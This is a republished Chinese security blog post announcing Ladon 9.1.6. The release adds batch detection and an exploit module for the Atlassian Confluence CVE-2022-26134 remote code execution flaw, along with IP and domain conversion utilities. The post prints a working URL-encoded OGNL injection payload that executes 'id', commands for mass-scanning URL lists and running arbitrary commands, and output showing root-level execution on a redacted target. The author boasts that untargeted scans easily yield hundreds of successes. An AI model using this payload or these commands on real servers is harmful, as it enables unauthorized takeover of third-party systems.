[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞

admin 2022年6月9日09:52:23评论342 views字数 3844阅读12分48秒阅读模式

Ladon 9.1.6 新增功能

Ladon 9.1.6 20220608[+]CVE-2022-26134  批量检测Atlassian Confluence CVE-2022-26134[+]EXP-2022-26134  Atlassian Confluence CVE-2022-26134 EXP[+]IP24        批量IP转成ip24格式(192.168.1.1/24)[+]IPC        批量IP转成ip C格式(192.168.1.)[+]IPB        批量IP转成ip B格式(192.168.)[+]Domain2IP  Host2IP  机器名转IP 域名解析IP

漏洞信息

澳大利亚软件公司认为网络安全公司Volexity发现了该漏洞,该漏洞被跟踪为CVE-2022-26134。美国网络安全和基础设施局 (CISA) 强烈建议组织查看Confluence 安全公告 2022-06-02以获取更多信息。CISA 敦促使用受影响的 Atlassian 的 Confluence 服务器和数据中心产品的组织阻止所有进出这些设备的互联网流量,直到更新可用并成功应用。根据 Volexity 的说法,“攻击者使用了一个零日漏洞,现在分配了 CVE-2022-26134,它允许在服务器上执行未经身份验证的远程代码。” 分析继续警告说“这些类型的漏洞是危险的,因为只要可以向 Confluence Server 系统发出 Web 请求,攻击者就可以在没有凭据的情况下执行命令并完全控制易受攻击的系统。”


影响版本

Confluence Server and Data Center >= 1.3.0Confluence Server and Data Center < 7.4.17Confluence Server and Data Center < 7.13.7Confluence Server and Data Center < 7.14.3Confluence Server and Data Center < 7.15.2Confluence Server and Data Center < 7.16.4Confluence Server and Data Center < 7.17.4Confluence Server and Data Center < 7.18.1

PS: 实际影响不只以上版本,可以看到下图测试的7.12.2也是成功的


POC

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/


[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞


复现,可以docker,也可以直接漏洞引擎批量,不指定目标的话成功率顶高的,随便扫一下就几百个成功的,但是匹配指定目标C段IP,一个都没有。


批量检测

C:Usersk8gege>Ladon url.txt CVE-2022-26134Ladon 9.1.6Start: 2022-06-09 00:25:46PC Name: WIN7 Lang: zh-CNRuntime: .net 2.0  me: x86 OS: x86OS Name: Microsoft Windows 7 旗舰版Machine Make: VMware, Inc.RunUser: Administrator PR: *IsAdminPriv: SeImpersonatePrivilege 已启用PID: 5060  CurrentProcess: LadonFreeSpace: Disk C: 4393 MB
load CVE-2022-26134scan url.txt (URL)=============================================https://xxxxxxxx CVE-2022-26134 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)=============================================

[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞


EXP-2022-26134

单个检测,或执行任意命令

C:Usersk8gege>Ladon  EXP-2022-26134 https://xxxxxxxx idLadon 9.1.6Start: 2022-06-09 00:46:12PC Name: WIN7 Lang: zh-CNRuntime: .net 2.0  me: x86 OS: x86OS Name: Microsoft Windows 7 旗舰版Machine Make: VMware, Inc.RunUser: Administrator PR: *IsAdminPriv: SeImpersonatePrivilege 已启用PID: 5552  CurrentProcess: LadonFreeSpace: Disk C: 4393 MB
Load EXP-2022-26134uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞


批量IP转换

为了方便批量检测各种漏洞,或者匹配漏洞结果是否出现目标C段IP,新增将ip.txt处理成C段或B段格式,用法如下:

C:Usersk8gege>Ladon ip.txt IP24Ladon 9.1.6Start: 2022-06-08 08:17:20PC Name: WIN7 Lang: zh-CNRuntime: .net 2.0  me: x86 OS: x86OS Name: Microsoft Windows 7 旗舰版Machine Make: VMware, Inc.RunUser: Administrator PR: *IsAdminPriv: SeImpersonatePrivilege 已启用PID: 4224  CurrentProcess: LadonFreeSpace: Disk C: 4415 MB
load IP2ip24scan ip.txt (IP)=============================================10.10.8.1/24192.168.1.1/24123.8.78.1/24172.10.5.1/24=============================================OnlinePC:0
C:Usersk8gege>Ladon ip.txt IPCLadon 9.1.6Start: 2022-06-08 08:17:24PC Name: WIN7 Lang: zh-CNRuntime: .net 2.0 me: x86 OS: x86OS Name: Microsoft Windows 7 旗舰版Machine Make: VMware, Inc.RunUser: Administrator PR: *IsAdminPriv: SeImpersonatePrivilege 已启用PID: 6656 CurrentProcess: LadonFreeSpace: Disk C: 4416 MB
load IP2ipcscan ip.txt (IP)=============================================123.8.78.192.168.1.172.10.5.10.10.8.=============================================OnlinePC:0


[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞


批量域名解析

C:Usersk8gege>Ladon domain.txt Domain2IPLadon 9.1.6Start: 2022-06-08 08:36:01PC Name: WIN7 Lang: zh-CNRuntime: .net 2.0  me: x86 OS: x86OS Name: Microsoft Windows 7 旗舰版Machine Make: VMware, Inc.RunUser: Administrator PR: *IsAdminPriv: SeImpersonatePrivilege 已启用PID: 3612  CurrentProcess: LadonFreeSpace: Disk C: 4410 MB
load Domain2IPscan domain.txt (Domain)=============================================123.151.137.18220.181.38.251183.3.226.3561.129.7.47220.181.38.148=============================================

[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞


原文始发于微信公众号(K8实验室):[教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月9日09:52:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [教程]Ladon 9.1.6 批量检测CVE-2022-26134漏洞http://cn-sec.com/archives/1100660.html

发表评论

匿名网友 填写信息